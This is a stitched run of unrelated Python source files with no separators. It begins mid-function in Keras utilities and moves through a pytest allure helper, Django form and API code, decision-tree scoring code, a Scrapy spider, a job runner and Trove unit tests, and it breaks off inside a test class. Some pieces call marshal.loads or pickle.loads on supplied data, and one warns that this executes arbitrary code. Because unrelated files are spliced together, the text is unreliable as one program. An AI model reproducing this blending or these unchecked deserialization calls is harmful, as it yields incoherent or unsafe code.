    raw_code = codecs.decode(code.encode('ascii'), 'base64')
  except (UnicodeEncodeError, binascii.Error):
    # Fall back for payloads that are not valid base64 text.
    raw_code = code.encode('raw_unicode_escape')
  code = marshal.loads(raw_code)
  if globs is None:
    globs = globals()
  return python_types.FunctionType(
      code, globs, name=code.co_name, argdefs=defaults, closure=closure)


def has_arg(fn, name, accept_all=False):
  """Checks if a callable accepts a given keyword argument.

  Arguments:
      fn: Callable to inspect.
      name: Check if `fn` can be called with `name` as a keyword argument.
      accept_all: What to return if there is no parameter called `name`
                  but the function accepts a `**kwargs` argument.

  Returns:
      bool, whether `fn` accepts a `name` keyword argument.
  """
  spec = tf_inspect.getfullargspec(fn)
  if name in spec.args:
    return True
  # Optionally treat a **kwargs catch-all as accepting the argument.
  return bool(accept_all and spec.varkw is not None)


@keras_export('keras.utils.Progbar')
class Progbar(object):
  """Displays a progress bar.

  Arguments:
      target: Total number of steps expected, None if unknown.
      width: Progress bar width on screen.
      verbose: Verbosity mode, 0 (silent), 1 (verbose), 2 (semi-verbose)
      stateful_metrics: Iterable of string names of metrics that
          should *not* be averaged over time. Metrics in this list
          will be displayed as-is. All others will be averaged
          by the progbar before display.
      interval: Minimum visual progress update interval (in seconds).
      unit_name: Display name for step counts (usually "step" or "sample").
  """

  def __init__(self, target, width=30, verbose=1, interval=0.05,
               stateful_metrics=None, unit_name='step'):
    self.target = target
    self.width = width
    self.verbose = verbose
    self.interval = interval
    self.unit_name = unit_name
    if stateful_metrics:
      self.stateful_metrics = set(stateful_metrics)
    else:
      self.stateful_metrics = set()

    # In-place line rewriting ('\b'/'\r') is only used when stdout looks
    # like a real terminal or a notebook/posix kernel module is loaded;
    # otherwise every refresh writes a fresh line.
    self._dynamic_display = ((hasattr(sys.stdout, 'isatty') and
                              sys.stdout.isatty()) or
                             'ipykernel' in sys.modules or
                             'posix' in sys.modules)
    # Width of the last rendered line, used to blank out leftovers.
    self._total_width = 0
    self._seen_so_far = 0
    # We use a dict + list to avoid garbage collection
    # issues found in OrderedDict
    self._values = {}
    self._values_order = []
    self._start = time.time()
    self._last_update = 0

  def update(self, current, values=None):
    """Updates the progress bar.

    Arguments:
        current: Index of current step.
        values: List of tuples:
            `(name, value_for_last_step)`.
            If `name` is in `stateful_metrics`,
            `value_for_last_step` will be displayed as-is.
            Else, an average of the metric over time will be displayed.
    """
    values = values or []
    for k, v in values:
      if k not in self._values_order:
        self._values_order.append(k)
      if k not in self.stateful_metrics:
        # Averaged metrics accumulate a (weighted sum, step count) pair,
        # weighted by the number of steps since the last update.
        if k not in self._values:
          self._values[k] = [v * (current - self._seen_so_far),
                             current - self._seen_so_far]
        else:
          self._values[k][0] += v * (current - self._seen_so_far)
          self._values[k][1] += (current - self._seen_so_far)
      else:
        # Stateful metrics output a numeric value. This representation
        # means "take an average from a single value" but keeps the
        # numeric formatting.
        self._values[k] = [v, 1]
    self._seen_so_far = current

    now = time.time()
    info = ' - %.0fs' % (now - self._start)
    if self.verbose == 1:
      # Throttle redraws to self.interval, except for the final step.
      if (now - self._last_update < self.interval and
          self.target is not None and current < self.target):
        return

      prev_total_width = self._total_width
      if self._dynamic_display:
        # Rewind to the start of the line to redraw in place.
        sys.stdout.write('\b' * prev_total_width)
        sys.stdout.write('\r')
      else:
        sys.stdout.write('\n')

      if self.target is not None:
        # Render e.g. " 37/100 [=========>....................]".
        numdigits = int(np.log10(self.target)) + 1
        bar = ('%' + str(numdigits) + 'd/%d [') % (current, self.target)
        prog = float(current) / self.target
        prog_width = int(self.width * prog)
        if prog_width > 0:
          bar += ('=' * (prog_width - 1))
          if current < self.target:
            bar += '>'
          else:
            bar += '='
        bar += ('.' * (self.width - prog_width))
        bar += ']'
      else:
        bar = '%7d/Unknown' % current

      self._total_width = len(bar)
      sys.stdout.write(bar)

      if current:
        time_per_unit = (now - self._start) / current
      else:
        time_per_unit = 0
      if self.target is not None and current < self.target:
        # Show an ETA while in progress, formatted h:mm:ss / m:ss / s.
        eta = time_per_unit * (self.target - current)
        if eta > 3600:
          eta_format = '%d:%02d:%02d' % (eta // 3600,
                                         (eta % 3600) // 60,
                                         eta % 60)
        elif eta > 60:
          eta_format = '%d:%02d' % (eta // 60, eta % 60)
        else:
          eta_format = '%ds' % eta

        info = ' - ETA: %s' % eta_format
      else:
        # Finished (or unknown target): show throughput instead, picking
        # s/ms/us per unit for readability.
        if time_per_unit >= 1 or time_per_unit == 0:
          info += ' %.0fs/%s' % (time_per_unit, self.unit_name)
        elif time_per_unit >= 1e-3:
          info += ' %.0fms/%s' % (time_per_unit * 1e3, self.unit_name)
        else:
          info += ' %.0fus/%s' % (time_per_unit * 1e6, self.unit_name)

      for k in self._values_order:
        info += ' - %s:' % k
        if isinstance(self._values[k], list):
          # Averaged metric: weighted sum / count accumulated above.
          avg = np.mean(self._values[k][0] / max(1, self._values[k][1]))
          if abs(avg) > 1e-3:
            info += ' %.4f' % avg
          else:
            info += ' %.4e' % avg
        else:
          info += ' %s' % self._values[k]

      self._total_width += len(info)
      if prev_total_width > self._total_width:
        # Pad with spaces to erase residue from the longer previous line.
        info += (' ' * (prev_total_width - self._total_width))

      if self.target is not None and current >= self.target:
        info += '\n'

      sys.stdout.write(info)
      sys.stdout.flush()

    elif self.verbose == 2:
      # Semi-verbose: print a single summary line only upon completion.
      if self.target is not None and current >= self.target:
        numdigits = int(np.log10(self.target)) + 1
        count = ('%' + str(numdigits) + 'd/%d') % (current, self.target)
        info = count + info
        for k in self._values_order:
          info += ' - %s:' % k
          avg = np.mean(self._values[k][0] / max(1, self._values[k][1]))
          if avg > 1e-3:
            info += ' %.4f' % avg
          else:
            info += ' %.4e' % avg
        info += '\n'

        sys.stdout.write(info)
        sys.stdout.flush()

    self._last_update = now

  def add(self, n, values=None):
    # Convenience wrapper: advance the bar by `n` steps.
    self.update(self._seen_so_far + n, values)


def make_batches(size, batch_size):
  """Returns a list of batch indices (tuples of indices).

  Arguments:
      size: Integer, total size of the data to slice into batches.
      batch_size: Integer, batch size.

  Returns:
      A list of tuples of array indices.
  """
  batch_count = int(np.ceil(size / float(batch_size)))
  bounds = []
  for idx in range(batch_count):
    start = idx * batch_size
    # The final batch is clipped to `size`.
    bounds.append((start, min(size, start + batch_size)))
  return bounds


def slice_arrays(arrays, start=None, stop=None):
  """Slice an array or list of arrays.

  Accepts either a single array-like or a list of array-likes and
  returns the matching slice(s):
      - arrays[start:stop] if `arrays` is an array-like
      - [x[start:stop] for x in arrays] if `arrays` is a list

  `start` may instead be a list/array of indices, in which case `stop`
  must be None and fancy indexing (`x[start]`) is applied.

  Arguments:
      arrays: Single array or list of arrays.
      start: can be an integer index (start index)
          or a list/array of indices
      stop: integer (stop index); should be None if
          `start` was a list.

  Returns:
      A slice of the array(s).

  Raises:
      ValueError: If the value of start is a list and stop is not None.
  """
  if arrays is None:
    return [None]
  if isinstance(start, list) and stop is not None:
    raise ValueError('The stop argument has to be None if the value of start '
                     'is a list.')
  if isinstance(arrays, list):
    if hasattr(start, '__len__'):
      # hdf5 datasets only support list objects as indices
      if hasattr(start, 'shape'):
        start = start.tolist()
      return [None if x is None else x[start] for x in arrays]
    sliced = []
    for x in arrays:
      # Non-subscriptable entries (and None) map to None.
      if x is None or not hasattr(x, '__getitem__'):
        sliced.append(None)
      else:
        sliced.append(x[start:stop])
    return sliced
  if hasattr(start, '__len__'):
    if hasattr(start, 'shape'):
      start = start.tolist()
    return arrays[start]
  if hasattr(start, '__getitem__'):
    return arrays[start:stop]
  return [None]


def to_list(x):
  """Normalizes a list/tensor into a list.

  If a tensor is passed, we return
  a list of size 1 containing the tensor.

  Arguments:
      x: target object to be normalized.

  Returns:
      A list.
  """
  return x if isinstance(x, list) else [x]


def object_list_uid(object_list):
  """Creates a single string from object ids."""
  flattened = nest.flatten(object_list)
  # Join the (absolute) id of every flattened element.
  return ', '.join(str(abs(id(entry))) for entry in flattened)


def to_snake_case(name):
  """Converts a CamelCase `name` to snake_case, avoiding a leading '_'."""
  intermediate = re.sub('(.)([A-Z][a-z0-9]+)', r'\1_\2', name)
  insecure = re.sub('([a-z])([A-Z])', r'\1_\2', intermediate).lower()
  # If the class is private the name starts with "_" which is not secure
  # for creating scopes. We prefix the name with "private" in this case.
  if insecure.startswith('_'):
    return 'private' + insecure
  return insecure


def is_all_none(structure):
  """Returns True iff every flattened element of `structure` is None."""
  # We cannot use Python's `any` because the iterable may return Tensors.
  for element in nest.flatten(structure):
    if element is not None:
      return False
  return True


def check_for_unexpected_keys(name, input_dict, expected_values):
  """Raises ValueError when `input_dict` has keys outside `expected_values`."""
  unknown = set(input_dict) - set(expected_values)
  if unknown:
    raise ValueError('Unknown entries in {} dictionary: {}. Only expected '
                     'following keys: {}'.format(name, list(unknown),
                                                 expected_values))


def validate_kwargs(kwargs, allowed_kwargs,
                    error_message='Keyword argument not understood:'):
  """Checks that all keyword arguments are in the set of allowed keys."""
  for key in kwargs:
    # Reject the first unknown keyword encountered.
    if key not in allowed_kwargs:
      raise TypeError(error_message, key)

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

import pytest
import allure_commons
from allure_pytest.utils import ALLURE_LABEL_PREFIX, ALLURE_LINK_PREFIX


class AllureTestHelper(object):
    """Translates allure label/link hooks into pytest marks."""

    def __init__(self, config):
        self.config = config

    @allure_commons.hookimpl
    def decorate_as_label(self, label_type, labels):
        # Build the pytest mark named "<prefix>.<label_type>".
        marker_name = '{prefix}.{label_type}'.format(prefix=ALLURE_LABEL_PREFIX, label_type=label_type)
        mark = getattr(pytest.mark, marker_name)
        return mark(*labels, label_type=label_type)

    @allure_commons.hookimpl
    def decorate_as_link(self, url, link_type, name):
        # Expand the URL through the configured per-type link pattern;
        # the default pattern u'{}' leaves it unchanged.
        marker_name = '{prefix}.{link_type}'.format(prefix=ALLURE_LINK_PREFIX, link_type=link_type)
        patterns = dict(self.config.option.allure_link_pattern)
        expanded = patterns.get(link_type, u'{}').format(url)
        mark = getattr(pytest.mark, marker_name)
        return mark(expanded, name=name, link_type=link_type)

#
# farmwork/forms.py
#

from django import forms
from django.utils.text import slugify
from .models import Farmwork


# ========================================================
# FARMWORK FORM
# ========================================================

class FarmworkForm(forms.ModelForm):
    """ModelForm for Farmwork listings.

    On the first save a slug is generated from the fruit, role and city
    so listings get readable URLs.
    """

    class Meta:
        model = Farmwork
        fields = [
            'job_role',
            'job_fruit',
            'job_pay',
            'job_pay_type',
            'job_start_date',
            'job_duration',
            'job_duration_type',
            'job_description',
            'con_first_name',
            'con_surname',
            'con_number',
            'con_email',
            'con_description',
            'acc_variety',
            'acc_price',
            'acc_price_type',
            'acc_description',
            'loc_street_address',
            'loc_city',
            'loc_state',
            'loc_post_code',
        ]

    # --
    # AUTO GENERATE SLUG ON SAVE
    # Credit: https://keyerror.com/blog/automatically-generating-unique-slugs-in-django
    # --

    def save(self, commit=True):
        """Save the form, generating the slug on first save.

        FIX: accepts the standard ModelForm `commit` argument (the
        previous signature broke callers passing commit=False). The
        default preserves the old always-save behavior.
        """
        if self.instance.pk:
            # Existing record: slug was set on creation; normal save.
            return super(FarmworkForm, self).save(commit=commit)

        instance = super(FarmworkForm, self).save(commit=False)
        instance.slug = slugify(instance.get_job_fruit_display() + '-' + instance.get_job_role_display() + '-in-' + instance.loc_city)
        if commit:
            instance.save()

        return instance

from django.contrib.auth.models import AnonymousUser

from core.models import Identity

from api.v2.serializers.post import AccountSerializer
from api.v2.views.base import AdminAuthViewSet


class AccountViewSet(AdminAuthViewSet):
    """
    API endpoint that allows providers to be viewed or edited.
    """
    lookup_fields = ("id", "uuid")
    queryset = Identity.objects.all()
    serializer_class = AccountSerializer
    http_method_names = ['post', 'head', 'options', 'trace']

    def get_queryset(self):
        """
        Filter providers by current user.

        Anonymous requests get an empty queryset; authenticated users get
        their current identities.
        """
        user = self.request.user
        # FIX: isinstance instead of `type(...) ==` so AnonymousUser
        # subclasses are treated as anonymous too.
        if isinstance(user, AnonymousUser):
            return Identity.objects.none()

        return user.current_identities()

# Copyright 2017 Priscilla Boyd. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================

"""
    The DT_Utils module provides helper functions for Decision Tree algorithms implementation, model creation and
    analysis.
"""
import pickle
from matplotlib import pyplot as plt
from sklearn.metrics import mean_squared_error
from tools.Utils import create_folder_if_not_exists


# noinspection PyTypeChecker
def score_dt(model_name, model, X, y, y_actual, output_folder):
    """
    Score a decision tree model and write the scores to a text file.

    :param string model_name: title for the model used on the output filename
    :param dataframe model: model reference
    :param dataframe X: examples
    :param dataframe y: targets
    :param dataframe y_actual: target results
    :param string output_folder: location of the output / results
    """
    print("Scoring model...")
    model_score = model.score(X, y)
    mse = mean_squared_error(y, y_actual)

    # Tuples are printed verbatim, matching the original report format.
    mse_score = model_name, "- Mean Squared Error:", mse
    accuracy = model_name, "- Accuracy score (%):", "{:.2%}".format(model_score)

    # write to file
    path = output_folder + '/models'
    create_folder_if_not_exists(path)

    filename = path + '/score_' + model_name + '.txt'
    # FIX: the with-statement already closes the file; the previous
    # explicit scores.close() after the block was redundant and removed.
    with open(filename, 'w') as scores:
        print(mse_score, file=scores)
        print(accuracy, file=scores)
    print("Scores saved location:", filename)


def plot_dt(model_name, y_actual, y_test, output_folder):
    """
    Plot decision tree, y (training) vs y (test/actual).

    :param string model_name: title for the model used on the output filename
    :param dataframe y_actual: target results
    :param dataframe y_test: test targets
    :param string output_folder: location of the output / results
    """

    # Destination folder for the generated image.
    plot_dir = output_folder + '/models'

    print("Plotting results...")
    plt.scatter(y_actual, y_test, label='Duration')
    plt.title('Decision Tree')
    # Reference diagonal drawn in axes coordinates.
    plt.plot([0, 1], [0, 1], '--k', transform=plt.gca().transAxes)
    plt.xlabel('y (actual)')
    plt.ylabel('y (test)')
    plt.legend()
    plot_path = plot_dir + '/plot_' + model_name + '.png'
    plt.savefig(plot_path)
    print("Plot saved location:", plot_path)


def save_dt_model(model_name, model, folder):
    """
    Save model using Pickle binary format.

    :param dataframe model: model reference
    :param string model_name: title for the model used on the output filename
    :param string folder: location of model output
    """
    print("Saving model...")
    model_file = folder + '/models/' + model_name + '.pkl'
    # FIX: use a context manager so the handle is flushed and closed even
    # on error; the original opened the file and never closed it.
    with open(model_file, 'wb') as model_out:
        pickle.dump(model, model_out)
    print("Model saved location:", model_file)


def load_dt_model(pickle_model):
    """
    Retrieve model using Pickle binary format.

    Note: this calls pickle.loads, so the argument is the pickled *bytes*,
    not a file path (despite the parameter's name).

    :param bytes pickle_model: pickled model data
    :return: Pickle model for re-use
    :rtype: object
    """
    # SECURITY: pickle.loads executes arbitrary code during
    # deserialization; only unpickle trusted data.
    return pickle.loads(pickle_model)

from artnet import *
import SocketServer
import time, os, random, datetime, sys
import argparse
import socket
import struct
from subprocess import Popen, PIPE, STDOUT
import glob

# Verbose/debug output toggle for this script.
DEBUG = False
 
# UDP endpoint of the target node; 6454 is the port used by the Art-Net
# protocol (this script imports `artnet` above).
UDP_IP = "2.0.0.61"
UDP_PORT = 6454



import sys
from drone.actions.emr_launcher import launch_emr_task
from drone.actions.ssh_launcher import launch_ssh_task
from drone.job_runner.dependency_manager import dependencies_are_met
from drone.job_runner.job_progress_checker import check_running_job_progress
from drone.metadata.metadata import get_job_info, job_status, set_ready, set_running, set_failed

# Dispatch table mapping a job's 'type' to the function that launches it.
task_launcher = {'ssh': launch_ssh_task,
                 'emr': launch_emr_task}


def process(job_config, settings):
    """Advance one job through its lifecycle for every scheduled run.

    Iterates the job's metadata rows and dispatches on status:
    'failed' -> retry while the retry budget allows and dependencies are
    met; 'running' -> check progress; 'ready' -> run; 'succeeded' ->
    skip; 'not_ready' -> promote to ready and run once dependencies are
    met. Any other status terminates the process.
    """
    for job_id, schedule_time, execution_time, status, runs, uid in get_job_info(job_config.get('id'),
                                                                                 db_name=settings.metadata):

        if status == job_status.get('failed'):
            # Retry only while the configured 'retry' budget (0 when the
            # key is missing/falsy) exceeds the runs already attempted.
            if (int(job_config.get('retry')) if job_config.get('retry') else 0) > int(runs):
                settings.logger.debug(
                    '%s runs %s. set retries %s.' % (job_config.get('id'), runs, job_config.get('retry')))
                if dependencies_are_met(job_config, schedule_time, settings):
                    set_ready(job_config.get('id'), schedule_time, db_name=settings.metadata)
                    settings.logger.info('Job "%s" "%s" set as ready' % (job_config.get('id'), schedule_time))
                    run(job_config, schedule_time, settings)
                    continue
                else:
                    continue
            else:
                continue
        elif status == job_status.get('running'):
            # Already launched: just poll its progress.
            check_running_job_progress(job_config, schedule_time, uid, settings)
            continue
        elif status == job_status.get('ready'):
            run(job_config, schedule_time, settings)
        elif status == job_status.get('succeeded'):
            continue
        elif status == job_status.get('not_ready'):
            if dependencies_are_met(job_config, schedule_time, settings):
                set_ready(job_config.get('id'), schedule_time, db_name=settings.metadata)
                settings.logger.info('Job "%s" "%s" set as ready' % (job_config.get('id'), schedule_time))
                run(job_config, schedule_time, settings)
            else:
                continue
        else:
            # Metadata reported a status this runner does not recognize.
            settings.logger.error('Unknown job status "%s"' % status)
            sys.exit(1)


def run(job_config, schedule_time, settings):
    """Launch a single job and record the resulting state.

    Looks up the launcher for the job's type in `task_launcher`, starts
    it, then marks the job running on success or failed otherwise.
    """
    settings.logger.info('Starting job "%s" "%s"' % (job_config.get('id'), schedule_time))
    job_type = job_config.get('type')
    # FIX: explicit membership test instead of `assert` inside a bare
    # `except:` — asserts are stripped under -O and the bare except hid
    # unrelated errors. As before, we only warn and continue.
    if job_type not in settings.supported_job_types:
        settings.logger.warning(
            'Unsupported job type %s. Valid types are %s' % (job_type, str(settings.supported_job_types)))

    task_launched_successfully, uid = task_launcher.get(job_type)(job_config, schedule_time, settings)

    if task_launched_successfully:
        set_running(job_config.get('id'), schedule_time, uid, db_name=settings.metadata)
        settings.logger.info('Started job "%s" "%s"' % (job_config.get('id'), schedule_time))
    else:
        set_failed(job_config.get('id'), schedule_time, db_name=settings.metadata)
        settings.logger.warning('Failed to start job "%s" "%s"' % (job_config.get('id'), schedule_time))

import scrapy
from scrapy import log
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from rcbi.items import Part

import copy
import json
import re

# Captures the JSON object assigned to `product:` in the page's scripts.
VARIANT_JSON_REGEX = re.compile("product: ({.*}),")

class ShendronesSpider(CrawlSpider):
  """Crawls shendrones.myshopify.com, yielding one Part per variant."""
  name = "shendrones"
  allowed_domains = ["shendrones.myshopify.com"]
  start_urls = ["http://shendrones.myshopify.com/collections/all"]

  rules = (
    Rule(LinkExtractor(restrict_css=[".grid-item"]), callback='parse_item'),
  )

  def parse_item(self, response):
    """Parse a product page and emit a Part item per Shopify variant."""
    item = Part()
    item["site"] = self.name

    variant = {}
    item["variants"] = [variant]
    base_url = response.url

    item["manufacturer"] = "Shendrones"

    # Find the json info for variants.
    body = response.body_as_unicode()

    m = VARIANT_JSON_REGEX.search(body)
    if m:
      shopify_info = json.loads(m.group(1))
      global_title = shopify_info["title"]
      preorder = False
      if global_title.endswith("Pre Order"):
        global_title = global_title[:-len("Pre Order")].strip()
        variant["stock_state"] = "backordered"
        preorder = True
      for v in shopify_info["variants"]:
        if v["title"] != "Default Title":
          item["name"] = global_title + " " + v["title"]
          variant["url"] = base_url + "?variant=" + str(v["id"])
        else:
          item["name"] = global_title
          variant["url"] = base_url
        # FIX: the price appears to be in cents; divide by 100.0 so the
        # result stays fractional under Python 2's integer division too
        # (1099 / 100 used to truncate to "$10.00").
        variant["price"] = "${:.2f}".format(v["price"] / 100.0)
        if not preorder:
          if v["inventory_quantity"] <= 0:
            if v["inventory_policy"] == "deny":
              variant["stock_state"] = "out_of_stock"
            else:
              variant["stock_state"] = "backordered"
          elif v["inventory_quantity"] < 3:
            variant["stock_state"] = "low_stock"
            variant["stock_text"] = "Only " + str(v["inventory_quantity"]) + " left!"
          else:
            variant["stock_state"] = "in_stock"

        # Yield a deep copy per variant so later mutations don't clobber
        # items already handed to the pipeline.
        yield item
        item = copy.deepcopy(item)
        variant = item["variants"][0]

from karld.loadump import dump_dicts_to_json_file

from karld.loadump import ensure_dir
from karld.loadump import ensure_file_path_dir

from karld.loadump import i_get_csv_data
from karld.loadump import is_file_csv

from karld.loadump import i_get_json_data
from karld.loadump import is_file_json

from karld.loadump import raw_line_reader

from karld.loadump import split_csv_file
from karld.loadump import split_file

from karld.loadump import split_file_output
from karld.loadump import split_file_output_csv
from karld.loadump import split_file_output_json

from karld.loadump import write_as_csv
from karld.loadump import write_as_json

#    Copyright 2014 Rackspace Hosting
#    Copyright 2014 Hewlett-Packard Development Company, L.P.
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.
import uuid

from mock import Mock, patch

from trove.backup import models as backup_models
from trove.common import cfg
from trove.common import exception
from trove.common.instance import ServiceStatuses
from trove.datastore import models as datastore_models
from trove.instance import models
from trove.instance.models import DBInstance
from trove.instance.models import filter_ips
from trove.instance.models import Instance
from trove.instance.models import InstanceServiceStatus
from trove.instance.models import SimpleInstance
from trove.instance.tasks import InstanceTasks
from trove.taskmanager import api as task_api
from trove.tests.fakes import nova
from trove.tests.unittests import trove_testtools
from trove.tests.unittests.util import util

# Module-level shortcut to the global oslo.config registry used by the tests.
CONF = cfg.CONF


class SimpleInstanceTest(trove_testtools.TestCase):
    """Tests for SimpleInstance visible-IP filtering via CONF regexes."""

    def setUp(self):
        super(SimpleInstanceTest, self).setUp()
        db_info = DBInstance(
            InstanceTasks.BUILDING, name="TestInstance")
        self.instance = SimpleInstance(
            None, db_info, InstanceServiceStatus(
                ServiceStatuses.BUILDING), ds_version=Mock(), ds=Mock())
        # One address per network label so label/IP filters are distinguishable.
        db_info.addresses = {"private": [{"addr": "123.123.123.123"}],
                             "internal": [{"addr": "10.123.123.123"}],
                             "public": [{"addr": "15.123.123.123"}]}
        # Save every CONF value the tests mutate so tearDown can restore it.
        self.orig_conf = CONF.network_label_regex
        self.orig_ip_regex = CONF.ip_regex
        self.orig_black_list_regex = CONF.black_list_regex

    def tearDown(self):
        super(SimpleInstanceTest, self).tearDown()
        CONF.network_label_regex = self.orig_conf
        # Bug fix: ip_regex and black_list_regex were saved in setUp but
        # never restored, leaking this class's overrides into other tests.
        CONF.ip_regex = self.orig_ip_regex
        CONF.black_list_regex = self.orig_black_list_regex
        CONF.ip_start = None

    def test_get_root_on_create(self):
        root_on_create_val = Instance.get_root_on_create(
            'redis')
        self.assertFalse(root_on_create_val)

    def test_filter_ips_white_list(self):
        CONF.network_label_regex = '.*'
        CONF.ip_regex = '^(15.|123.)'
        CONF.black_list_regex = '^10.123.123.*'
        ip = self.instance.get_visible_ip_addresses()
        ip = filter_ips(
            ip, CONF.ip_regex, CONF.black_list_regex)
        self.assertEqual(2, len(ip))
        self.assertTrue('123.123.123.123' in ip)
        self.assertTrue('15.123.123.123' in ip)

    def test_filter_ips_black_list(self):
        CONF.network_label_regex = '.*'
        CONF.ip_regex = '.*'
        CONF.black_list_regex = '^10.123.123.*'
        ip = self.instance.get_visible_ip_addresses()
        ip = filter_ips(
            ip, CONF.ip_regex, CONF.black_list_regex)
        self.assertEqual(2, len(ip))
        self.assertTrue('10.123.123.123' not in ip)

    def test_one_network_label(self):
        CONF.network_label_regex = 'public'
        ip = self.instance.get_visible_ip_addresses()
        self.assertEqual(['15.123.123.123'], ip)

    def test_two_network_labels(self):
        CONF.network_label_regex = '^(private|public)$'
        ip = self.instance.get_visible_ip_addresses()
        self.assertEqual(2, len(ip))
        self.assertTrue('123.123.123.123' in ip)
        self.assertTrue('15.123.123.123' in ip)

    def test_all_network_labels(self):
        CONF.network_label_regex = '.*'
        ip = self.instance.get_visible_ip_addresses()
        self.assertEqual(3, len(ip))
        self.assertTrue('10.123.123.123' in ip)
        self.assertTrue('123.123.123.123' in ip)
        self.assertTrue('15.123.123.123' in ip)


class CreateInstanceTest(trove_testtools.TestCase):
    """Tests for Instance.create restoring from a backup (size validation)."""

    @patch.object(task_api.API, 'get_client', Mock(return_value=Mock()))
    def setUp(self):
        util.init_db()
        self.context = trove_testtools.TroveTestContext(self, is_admin=True)
        self.name = "name"
        self.flavor_id = 5
        self.image_id = "UUID"
        self.databases = []
        self.users = []
        self.datastore = datastore_models.DBDatastore.create(
            id=str(uuid.uuid4()),
            name='mysql' + str(uuid.uuid4()),
        )
        self.datastore_version = (
            datastore_models.DBDatastoreVersion.create(
                id=str(uuid.uuid4()),
                datastore_id=self.datastore.id,
                name="5.5" + str(uuid.uuid4()),
                manager="mysql",
                image_id="image_id",
                packages="",
                active=True))
        self.volume_size = 1
        self.az = "az"
        self.nics = None
        self.configuration = None
        self.tenant_id = "UUID"
        self.datastore_version_id = str(uuid.uuid4())

        self.db_info = DBInstance.create(
            name=self.name, flavor_id=self.flavor_id,
            tenant_id=self.tenant_id,
            volume_size=self.volume_size,
            datastore_version_id=self.datastore_version.id,
            task_status=InstanceTasks.BUILDING,
            configuration_id=self.configuration
        )

        self.backup_name = "name"
        self.descr = None
        self.backup_state = backup_models.BackupState.COMPLETED
        self.instance_id = self.db_info.id
        self.parent_id = None
        self.deleted = False

        self.backup = backup_models.DBBackup.create(
            name=self.backup_name,
            description=self.descr,
            tenant_id=self.tenant_id,
            state=self.backup_state,
            instance_id=self.instance_id,
            parent_id=self.parent_id,
            datastore_version_id=self.datastore_version.id,
            deleted=False
        )
        # Default backup is slightly larger than the 1 GB volume so the
        # size-validation test fails as expected.
        self.backup.size = 1.1
        self.backup.save()
        self.backup_id = self.backup.id
        # Monkey-patch module attributes; originals are kept on self and
        # restored in tearDown.
        self.orig_client = models.create_nova_client
        models.create_nova_client = nova.fake_create_nova_client
        self.orig_api = task_api.API(self.context).create_instance
        task_api.API(self.context).create_instance = Mock()
        self.run_with_quotas = models.run_with_quotas
        models.run_with_quotas = Mock()
        self.check = backup_models.DBBackup.check_swift_object_exist
        backup_models.DBBackup.check_swift_object_exist = Mock(
            return_value=True)
        super(CreateInstanceTest, self).setUp()

    @patch.object(task_api.API, 'get_client', Mock(return_value=Mock()))
    def tearDown(self):
        # Delete each DB record created in setUp exactly once (the original
        # code deleted db_info and backup twice) and restore every patched
        # module attribute.
        self.db_info.delete()
        self.backup.delete()
        self.datastore.delete()
        self.datastore_version.delete()
        models.create_nova_client = self.orig_client
        task_api.API(self.context).create_instance = self.orig_api
        models.run_with_quotas = self.run_with_quotas
        backup_models.DBBackup.check_swift_object_exist = self.check
        super(CreateInstanceTest, self).tearDown()

    def test_exception_on_invalid_backup_size(self):
        self.assertEqual(self.backup.id, self.backup_id)
        exc = self.assertRaises(
            exception.BackupTooLarge, models.Instance.create,
            self.context, self.name, self.flavor_id,
            self.image_id, self.databases, self.users,
            self.datastore, self.datastore_version,
            self.volume_size, self.backup_id,
            self.az, self.nics, self.configuration
        )
        self.assertIn("Backup is too large for "
                      "given flavor or volume.", str(exc))

    def test_can_restore_from_backup_with_almost_equal_size(self):
        # target size equals to "1Gb"
        self.backup.size = 0.99
        self.backup.save()
        instance = models.Instance.create(
            self.context, self.name, self.flavor_id,
            self.image_id, self.databases, self.users,
            self.datastore, self.datastore_version,
            self.volume_size, self.backup_id,
            self.az, self.nics, self.configuration)
        self.assertIsNotNone(instance)


class TestReplication(trove_testtools.TestCase):
    """Exercises the error paths of Instance.create for replicas."""

    def setUp(self):
        util.init_db()

        # Create a datastore whose default version is the version record
        # built immediately after it.
        datastore_id = str(uuid.uuid4())
        version_id = str(uuid.uuid4())
        self.datastore = datastore_models.DBDatastore.create(
            id=datastore_id,
            name='name' + str(uuid.uuid4()),
            default_version_id=version_id)

        self.datastore_version = datastore_models.DBDatastoreVersion.create(
            id=version_id,
            name='name' + str(uuid.uuid4()),
            image_id=str(uuid.uuid4()),
            packages=str(uuid.uuid4()),
            datastore_id=datastore_id,
            manager='mysql',
            active=1)

        # A healthy master instance with a RUNNING service status.
        self.master = DBInstance(
            InstanceTasks.NONE,
            id=str(uuid.uuid4()),
            name="TestMasterInstance",
            datastore_version_id=version_id)
        self.master.set_task_status(InstanceTasks.NONE)
        self.master.save()
        self.master_status = InstanceServiceStatus(
            ServiceStatuses.RUNNING,
            id=str(uuid.uuid4()),
            instance_id=self.master.id)
        self.master_status.save()

        # Swap in the fake nova client; restored in tearDown.
        self.safe_nova_client = models.create_nova_client
        models.create_nova_client = nova.fake_create_nova_client
        super(TestReplication, self).setUp()

    def tearDown(self):
        self.master.delete()
        self.master_status.delete()
        self.datastore.delete()
        self.datastore_version.delete()
        models.create_nova_client = self.safe_nova_client
        super(TestReplication, self).tearDown()

    @patch('trove.instance.models.LOG')
    def test_replica_of_not_active_master(self, mock_logging):
        # Put the master into a non-active state before requesting a replica.
        self.master.set_task_status(InstanceTasks.BUILDING)
        self.master.save()
        self.master_status.set_status(ServiceStatuses.BUILDING)
        self.master_status.save()
        self.assertRaises(
            exception.UnprocessableEntity, Instance.create,
            None, 'name', 1, "UUID", [], [], None,
            self.datastore_version, 1, None,
            slave_of_id=self.master.id)

    @patch('trove.instance.models.LOG')
